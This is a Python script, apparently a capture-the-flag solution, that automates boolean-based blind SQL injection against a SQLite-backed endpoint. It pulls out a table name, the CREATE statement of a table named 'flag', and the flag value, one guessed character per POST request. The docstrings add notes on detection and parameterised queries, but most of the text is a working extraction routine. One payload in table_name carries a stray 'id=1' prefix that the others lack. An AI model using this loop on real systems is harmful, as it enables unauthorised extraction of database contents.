def table_name(url: str) -> None:
    """Recover one table name from ``sqlite_master`` by boolean-based blind injection.

    Every guess is a separate POST whose ``id`` field carries an ``and length(...)``
    or ``and substr(...)`` condition; ``true_result`` (defined outside this snippet,
    presumably a marker string present only when the condition holds) decides
    whether the guess was right. Nothing is returned: progress is printed.

    From the defending side this loop is loud: one request per candidate length and
    up to 94 requests per recovered character, all differing only in the numeric
    operands of ``length()``/``substr()``. Request logs will show that burst, and a
    server that binds ``id`` as a query parameter instead of splicing it into SQL
    does not expose the true/false oracle the loop depends on.

    Args:
        url: Endpoint that receives the ``id`` form field.
    """
    # Local accumulator shadows the function name; harmless here since the
    # function never refers to itself.
    table_name = ''
    # `limit 1,1` = OFFSET 1 LIMIT 1: the second table in sqlite_master.
    select = "select name from sqlite_master where type='table' limit 1,1"
    for i in range(1, 60):
        # Probe the name's length first so the inner loops have a bound.
        tablelength_payload = f'''1 and length(({select}))={i}'''
        data = {'id':tablelength_payload}
        response = requests.post(url=url, data=data)
        if true_result in response.text:
            print("table length : "+str(i))
            for j in range(1, i + 1):
                print('[*]now in {}'.format(j))
                # Printable ASCII only (33..126); a character outside that range
                # is never matched and the position is silently skipped.
                for asc in range(33, 127):
                    ss = chr(asc)
                    table_payload = f'''id=1 and substr(({select}),{j},1)=\'{ss}\''''
                    data2 = {'id':table_payload}
                    res = requests.post(url=url, data=data2)
                    if true_result in res.text:
                        table_name = table_name + chr(asc)
                        print(table_name)
                        # Character found; move to the next position.
                        break
            # Length matched and all positions probed: stop the length scan.
            break
<br>def column_name(url: str) -> None:
    """Recover the ``CREATE TABLE`` text of table ``flag`` by boolean-based blind injection.

    Same probing scheme as ``table_name``: the ``id`` POST field carries an
    ``and length(...)`` / ``and substr(...)`` condition and ``true_result``
    (module-level, not shown here) marks a true response. Output is printed,
    nothing is returned.

    Detection and mitigation notes are the same as for ``table_name``: the
    signature is a run of near-identical POSTs whose ``id`` value differs only in
    ``substr()``/``length()`` operands, and a parameterised query on the server
    removes the oracle entirely.

    Args:
        url: Endpoint that receives the ``id`` form field.
    """
    column_name = ''
    # The `sql` column of sqlite_master holds the original CREATE statement,
    # which is where the column names live.
    select = "select sql from sqlite_master where type='table' and name = 'flag'"
    for i in range(1, 100):
        columnlength_payload = f'''1 and length(({select}))={i}'''
        data = {'id':columnlength_payload}
        response = requests.post(url=url, data=data)
        if true_result in response.text:
            print("column length : "+str(i))
            for j in range(1, i + 1):
                print("[*]now in {}".format(j))
                # Printable ASCII 33..126; whitespace (32) in the CREATE text is
                # never matched, so those positions are skipped in the output.
                for asc in range(33, 127):
                    ss = chr(asc)
                    column_payload = f'''1 and substr(({select}),{j},1)=\'{ss}\''''
                    data2 = {'id': column_payload}
                    res = requests.post(url=url, data=data2)
                    if true_result in res.text:
                        column_name = column_name + chr(asc)
                        print(column_name)
                        # Character found; next position.
                        break
            # Length matched and fully probed: stop the length scan.
            break
def getflag(url: str) -> None:
    """Recover the first row of ``flag.flag`` by boolean-based blind injection.

    Mirrors ``table_name``/``column_name``: length is probed first, then each
    position is matched against printable ASCII, one POST per guess, with
    ``true_result`` (defined outside this snippet) as the oracle. Result is
    printed, not returned.

    For defenders the same observations hold: the request burst is easy to spot
    in logs, and binding ``id`` as a parameter rather than concatenating it into
    SQL closes the oracle.

    Args:
        url: Endpoint that receives the ``id`` form field.
    """
    for i in range(1,60):
        # Reset per length candidate; only the matching length's loop fills it.
        flag = ''
        select = "select flag from flag limit 0,1"
        flaglength = f'''1 and length(({select}))={i}'''
        data = {'id': flaglength}
        response = requests.post(url=url, data=data)
        if true_result in response.text:
            print("flag length : "+str(i))
            for j in range(1, i+1):
                print("[*]now in {}".format(j))
                # Printable ASCII 33..126 only.
                for asc in range(33,127):
                    ss = chr(asc)
                    flagpayload = f'''1 and substr(({select}),{j},1)=\'{ss}\''''
                    data2 = {'id': flagpayload}
                    res = requests.post(url=url, data=data2)
                    if true_result in res.text:
                        flag = flag+chr(asc)
                        print(flag)
                        # Character found; next position.
                        break
            # Length matched and fully probed: stop the length scan.
            break